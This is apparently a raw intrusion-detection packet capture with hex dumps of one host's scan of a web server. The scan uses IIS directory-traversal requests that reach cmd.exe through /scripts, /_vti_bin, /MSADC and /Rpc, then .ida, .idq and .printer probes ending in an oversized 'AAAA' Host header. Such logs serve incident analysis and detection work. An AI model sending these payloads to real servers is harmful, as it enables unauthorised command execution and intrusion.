=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:11:49.919387 210.201.100.253:3493 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:5265 IpLen:20 DgmLen:130 DF ***AP*** Seq: 0x9A67604D Ack: 0xD719055B Win: 0x4470 TcpLen: 20 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 63 2E 2E 61 66 2E 2E 25 63 2E 2E 61 66 2E 2E 2F c..af..%c..af../ 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 2F 63 md.exe?/c+dir /c 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 md.exe?/c+dir HT 54 50 2F 31 2E 30 0D 0A 0D 0A TP/1.0.... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:12:12.111545 210.201.100.253:3582 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:6134 IpLen:20 DgmLen:130 DF ***AP*** Seq: 0x9AEFBCEB Ack: 0xD926A750 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 63 2E 2E 31 63 2E 2E 25 63 2E 2E 31 63 2E 2E 2F c..1c..%c..1c../ 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 2F 63 md.exe?/c+dir /c 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 md.exe?/c+dir HT 54 50 2F 31 2E 30 0D 0A 0D 0A TP/1.0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:12:34.303772 210.201.100.253:3706 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:7036 IpLen:20 DgmLen:130 DF ***AP*** Seq: 0x9B946C4C Ack: 0xD9BD82D5 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 63 2E 2E 39 63 2E 2E 25 63 2E 2E 39 63 2E 2E 2F c..9c..%c..9c../ 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 2F 63 md.exe?/c+dir /c 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 md.exe?/c+dir HT 54 50 2F 31 2E 30 0D 0A 0D 0A TP/1.0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:12:56.505946 210.201.100.253:3823 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:7884 IpLen:20 DgmLen:144 DF ***AP*** Seq: 0x9C333A58 Ack: 0xDB86BB94 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 
25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 %5c..%5c..%5c..% 35 63 2E 2E 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 5c..%5c../winnt/ 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe 3F 2F 63 2B 64 69 72 20 65 6D 33 32 2F 63 6D 64 ?/c+dir em32/cmd 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 .exe?/c+dir HTTP 2F 31 2E 30 0D 0A 0D 0A /1.0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:13:18.688119 210.201.100.253:3940 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:8759 IpLen:20 DgmLen:134 DF ***AP*** Seq: 0x9CD32F45 Ack: 0xDC73AF1B Win: 0x4470 TcpLen: 20 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 %5c..%5c..%5c..% 35 63 2E 2E 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 5c..%5c../winnt/ 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe 3F 2F 63 2B 64 69 72 20 78 65 3F 2F 63 2B 64 69 ?/c+dir xe?/c+di 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:13:41.020410 210.201.100.253:4051 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:9647 IpLen:20 DgmLen:154 DF ***AP*** Seq: 0x9D6A879C Ack: 0xDDC0A1CA Win: 0x4470 TcpLen: 20 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 %5c..%5c..%5c..% 35 63 2E 2E 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 5c..%5c../winnt/ 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe 3F 2F 63 2B 64 69 72 20 77 69 6E 6E 74 2F 73 79 ?/c+dir winnt/sy 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/ 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0.. 0D 0A .. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:14:03.252651 210.201.100.253:4154 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:10842 IpLen:20 DgmLen:134 DF ***AP*** Seq: 0x9E005778 Ack: 0xDFD8D87D Win: 0x4470 TcpLen: 20 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 %5c..%5c..%5c..% 35 63 2E 2E 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 5c..%5c../winnt/ 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe 3F 2F 63 2B 64 69 72 20 78 65 3F 2F 63 2B 64 69 ?/c+dir xe?/c+di 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:14:25.434835 210.201.100.253:4267 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:11613 IpLen:20 DgmLen:129 DF ***AP*** Seq: 0x9E9CBE77 Ack: 0xE05C95AC Win: 0x4470 TcpLen: 20 47 45 54 20 2F 4D 53 41 44 43 2F 2E 2E 25 35 63 GET /MSADC/..%5c 2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 77 ..%5c..%5c..%5cw 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D innt/system32/cm 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 2F 63 6D d.exe?/c+dir /cm 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 d.exe?/c+dir HTT 50 2F 31 2E 30 0D 0A 0D 0A P/1.0.... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:14:47.617031 210.201.100.253:4373 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:12499 IpLen:20 DgmLen:129 DF ***AP*** Seq: 0x9F30CFB7 Ack: 0xE29D0315 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir 20 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 .exe?/c+dir HTT 50 2F 31 2E 30 0D 0A 0D 0A P/1.0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:15:09.829280 210.201.100.253:4503 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:13429 IpLen:20 DgmLen:121 DF ***AP*** Seq: 0x9FDA6BB2 Ack: 0xE3C333A0 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 4D 53 41 44 43 2F 2E 2E 25 35 63 GET /MSADC/..%5c 2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 77 ..%5c..%5c..%5cw 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D innt/system32/cm 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 3F 2F 63 d.exe?/c+dir ?/c 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0... 0A . 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:15:32.011586 210.201.100.253:4591 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:14240 IpLen:20 DgmLen:123 DF ***AP*** Seq: 0xA062B421 Ack: 0xE600AD52 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D c+dir HTTP/1.0. 0A 0D 0A ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:15:54.233802 210.201.100.253:4708 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:14973 IpLen:20 DgmLen:137 DF ***AP*** Seq: 0xA0FECBCA Ack: 0xE6AE24DE Win: 0x4470 TcpLen: 20 47 45 54 20 2F 4D 53 41 44 43 2F 2E 2E 25 35 63 GET /MSADC/..%5c 2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 77 ..%5c..%5c..%5cw 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D innt/system32/cm 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 73 79 73 d.exe?/c+dir sys 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0... 0A . 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:16:16.426711 210.201.100.253:4794 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:15836 IpLen:20 DgmLen:135 DF ***AP*** Seq: 0xA185C75A Ack: 0xE804331C Win: 0x4470 TcpLen: 20 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir 20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 32/cmd.exe?/c+d 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A ir HTTP/1.0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:16:38.629813 210.201.100.253:4917 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:16747 IpLen:20 DgmLen:121 DF ***AP*** Seq: 0xA2277D55 Ack: 0xEA125D4E Win: 0x4470 TcpLen: 20 47 45 54 20 2F 4D 53 41 44 43 2F 2E 2E 25 35 63 GET /MSADC/..%5c 2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 77 ..%5c..%5c..%5cw 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D innt/system32/cm 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 3F 2F 63 d.exe?/c+dir ?/c 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0... 0A . 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:17:00.822929 210.201.100.253:1046 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:17544 IpLen:20 DgmLen:123 DF ***AP*** Seq: 0xA2BAF1C0 Ack: 0xEB7E0853 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D c+dir HTTP/1.0. 0A 0D 0A ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:17:23.016127 210.201.100.253:1183 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:18518 IpLen:20 DgmLen:118 DF ***AP*** Seq: 0xA3665A26 Ack: 0xEC35EB6E Win: 0x4470 TcpLen: 20 47 45 54 20 2F 52 70 63 2F 2E 2E 25 35 63 2E 2E GET /Rpc/..%5c.. 25 35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 %5c..%5cwinnt/sy 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/ 63 2B 64 69 72 20 2E 65 78 65 3F 2F 63 2B 64 69 c+dir .exe?/c+di 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:17:45.219352 210.201.100.253:1263 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:19443 IpLen:20 DgmLen:112 DF ***AP*** Seq: 0xA3E87F08 Ack: 0xEDBCD731 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 52 70 63 2F 2E 2E 25 35 63 2E 2E GET /Rpc/..%5c.. 25 35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 %5c..%5cwinnt/sy 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/ 63 2B 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 c+dir c+dir HTTP 2F 31 2E 30 0D 0A 0D 0A /1.0.... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:18:07.412490 210.201.100.253:1313 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:20347 IpLen:20 DgmLen:124 DF ***AP*** Seq: 0xA456DAC9 Ack: 0xEF7662F9 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 52 70 63 2F 2E 2E 25 35 63 2E 2E GET /Rpc/..%5c.. 25 35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 %5c..%5cwinnt/sy 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/ 63 2B 64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 c+dir 32/cmd.exe 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 ?/c+dir HTTP/1.0 0D 0A 0D 0A .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:18:29.605510 210.201.100.253:1367 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:21054 IpLen:20 DgmLen:112 DF ***AP*** Seq: 0xA4CA83C5 Ack: 0xF0BDF17C Win: 0x4470 TcpLen: 20 47 45 54 20 2F 52 70 63 2F 2E 2E 25 35 63 2E 2E GET /Rpc/..%5c.. 25 35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 %5c..%5cwinnt/sy 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/ 63 2B 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 c+dir c+dir HTTP 2F 31 2E 30 0D 0A 0D 0A /1.0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ : =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/05-10:18:51.808560 210.201.100.253:1439 -> 12.82.129.120:80 TCP TTL:112 TOS:0x0 ID:21896 IpLen:20 DgmLen:113 DF ***AP*** Seq: 0xA548F37E Ack: 0xF1A751A4 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 73 5c..%5cwinnt/sys 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 2B 64 69 72 20 3F 2F 63 2B 64 69 72 20 48 54 54 +dir ?/c+dir HTT 50 2F 31 2E 30 0D 0A 0D 0A P/1.0.... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:19:14.011515 210.201.100.253:1493 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:22691 IpLen:20 DgmLen:109 DF
***AP*** Seq: 0xA5BB2944 Ack: 0xF376AB8F Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 73  5c..%5cwinnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E  +dir dir HTTP/1.
30 0D 0A 0D 0A                                   0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:19:36.204261 210.201.100.253:1569 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:23659 IpLen:20 DgmLen:117 DF
***AP*** Seq: 0xA63D83B0 Ack: 0xF3FB6117 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 73  5c..%5cwinnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 2E 65 78 65 3F 2F 63 2B 64 69 72  +dir .exe?/c+dir
20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A            HTTP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:19:58.426821 210.201.100.253:1616 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:24478 IpLen:20 DgmLen:123 DF
***AP*** Seq: 0xA6AB1AC9 Ack: 0xF59463AC Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 66 2E 2E 25 32 66 2E 2E 25 32 66 2E 2E 25 32  2f..%2f..%2f..%2
66 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F  fwinnt/system32/
63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 3F  cmd.exe?/c+dir ?
2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D  /c+dir HTTP/1.0.
0A 0D 0A                                         ...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:20:20.619276 210.201.100.253:1678 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:25154 IpLen:20 DgmLen:109 DF
***AP*** Seq: 0xA7252A67 Ack: 0xF74E1207 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 73  5c..%5cwinnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E  +dir dir HTTP/1.
30 0D 0A 0D 0A                                   0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:20:42.811681 210.201.100.253:1764 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:25994 IpLen:20 DgmLen:66 DF
***AP*** Seq: 0xA7AB8AAA Ack: 0xF95F8B07 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 6E 75 6C 6C 2E 69 64 61 20 48 54  GET /null.ida HT
54 50 2F 31 2E 30 0D 0A 0D 0A                    TP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:21:05.004139 210.201.100.253:1844 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:26829 IpLen:20 DgmLen:66 DF
***AP*** Seq: 0xA832CD77 Ack: 0xFB1A9ABD Win: 0x4470 TcpLen: 20
47 45 54 20 2F 6E 75 6C 6C 2E 69 64 71 20 48 54  GET /null.idq HT
54 50 2F 31 2E 30 0D 0A 0D 0A                    TP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:21:27.296448 210.201.100.253:1970 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:27763 IpLen:20 DgmLen:505 DF
***AP*** Seq: 0xA8D9EC80 Ack: 0xFC41A3CA Win: 0x4470 TcpLen: 20
47 45 54 20 2F 4E 55 4C 4C 2E 70 72 69 6E 74 65  GET /NULL.printe
72 20 48 54 54 50 2F 31 2E 30 0A 48 6F 73 74 3A  r HTTP/1.0.Host:
20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
